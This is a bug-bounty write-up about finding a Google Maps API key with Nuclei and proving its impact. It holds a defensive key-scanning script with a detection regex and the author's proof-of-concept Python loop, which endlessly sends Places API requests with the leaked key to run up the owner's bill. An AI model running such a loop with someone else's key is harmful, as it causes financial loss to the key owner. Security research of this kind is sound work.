How I proved impact with a Google Maps API key
In this story, I will share a method for proving impact when we find a Google Maps API key. In my bug hunting journey, I found a Google Maps API key. But I knew that a Google Maps API key is usually triaged as 'Informative'. So, I thought that I should prove the risk when the Google Maps API key is leaked. I will show you how I proved the impact.
Reproduce
After checking a target manually, I did recon with automation tools. First, I used Nuclei with default and custom templates.
With the default templates, I found a Google Maps API key in the /hopfully404 directory. I didn't know what the /hopfully404 directory was or how the template was structured.
The 'google-api-key' Nuclei template simply checks the response for the regex "AIza[0-9A-Za-z\\-]{35}" when it requests BaseURL and the BaseURL/hopfully404 directory.
On my target, when a user accesses the BaseURL/hopfully404 directory, the page redirects to the BaseURL page. The BaseURL default page contained the API key, so the Nuclei template could detect it.
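The same pattern the Nuclei template matches can be run against your own deployed HTML and JS bundles before someone else does. The scanner below is an added example, not code from the original post; it assumes the file suffixes to scan (.html, .js, .json, .map), adds '_' to the template's character class because real keys can contain it, and uses a constructed sample page rather than a real key.

```python
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# Pattern from the Nuclei 'google-api-key' template: 'AIza' followed by 35 chars.
# Assumption: '_' is added to the class (real keys may contain it); the lookahead
# stops the regex from matching the first 35 chars of a longer token.
GOOGLE_API_KEY_RE = re.compile(r"AIza[0-9A-Za-z_\-]{35}(?![0-9A-Za-z_\-])")

# Constructed sample page embedding a (fake) Maps key in a script tag.
SAMPLE_HTML = """<html><head><title>Store locator</title>
<script src="https://maps.googleapis.com/maps/api/js?key=AIza0123456789abcdefghijklmnopqrstuvwxy"></script>
<script>var region = "AIzaNotAKey";</script>
</head><body>...</body></html>"""


def mask_key(key: str) -> str:
    """Keep the prefix and last 4 chars so a report can reference the key without reprinting it."""
    return key[:8] + "*" * (len(key) - 12) + key[-4:]


def find_google_api_keys(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, masked_key) for each candidate key found in the text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in GOOGLE_API_KEY_RE.finditer(line):
            hits.append((lineno, mask_key(match.group(0))))
    return hits


def scan_paths(paths: List[str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan web assets under the given files/directories; findings keyed by file path."""
    findings = {}
    for root in paths:
        files = [Path(root)] if Path(root).is_file() else Path(root).rglob("*")
        for path in files:
            if not path.is_file() or path.suffix.lower() not in {".html", ".js", ".json", ".map"}:
                continue
            hits = find_google_api_keys(path.read_text(encoding="utf-8", errors="ignore"))
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    if len(sys.argv) == 1:  # no paths given: run against the constructed sample
        for lineno, key in find_google_api_keys(SAMPLE_HTML):
            print(f"sample html line {lineno}: {key}")
    else:
        for path, hits in scan_paths(sys.argv[1:]).items():
            for lineno, key in hits:
                print(f"{path}:{lineno}: {key}")
```

Run it over a local export of your site's static assets (e.g. the build output or a saved copy of the front page); a hit means the key must be restricted to your referrers and APIs or rotated.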
I searched for the Google Maps API key with Burp Suite. My target application had a world location search function. So, I think the application uses the maps.googleapis.com API in many other scripts, such as JS and HTML.
I used the 'keyhacks' tool (https://github.com/streaak/keyhacks) to test which APIs the key was enabled for. The API key can be used for multiple purposes. If requests made with the API key exceed a certain threshold, the owner of the API key has to pay depending on the number of requests.
import requests
import time

interval = 0.5
word_path = "*****/****/****/wordlist"


def send_request(words):
    # Send one Places Text Search request per word in the word list.
    for word in words:
        url = f"https://maps.googleapis.com/maps/api/place/textsearch/json?query={word}&key=********************"
        response = requests.get(url)
        if response.status_code == 200:
            print(f"{url}")
        else:
            print(f"Failed => {response.status_code}")


def read_query(file_path):
    # Read the word list, one query per line (newlines stripped); empty list on error.
    try:
        with open(file_path, 'r', encoding='utf-8') as file:
            return [line.strip() for line in file if line.strip()]
    except FileNotFoundError:
        print(f"File not found: {file_path}")
    except Exception as e:
        print(f"An error occurred: {e}")
    return []


if __name__ == "__main__":
    words = read_query(word_path)
    while True:
        send_request(words)
        time.sleep(interval)
Finally, I made a PoC. If an attacker sends requests excessively with the API key, the owner of the API key faces financial risk. With this code, an attacker can make a lot of requests with the API key automatically. The attacker can adjust the interval and the number of words in the word list.
Result
I reported it with this PoC, and in the end it was marked as a duplicate :)
Happy Hacking!!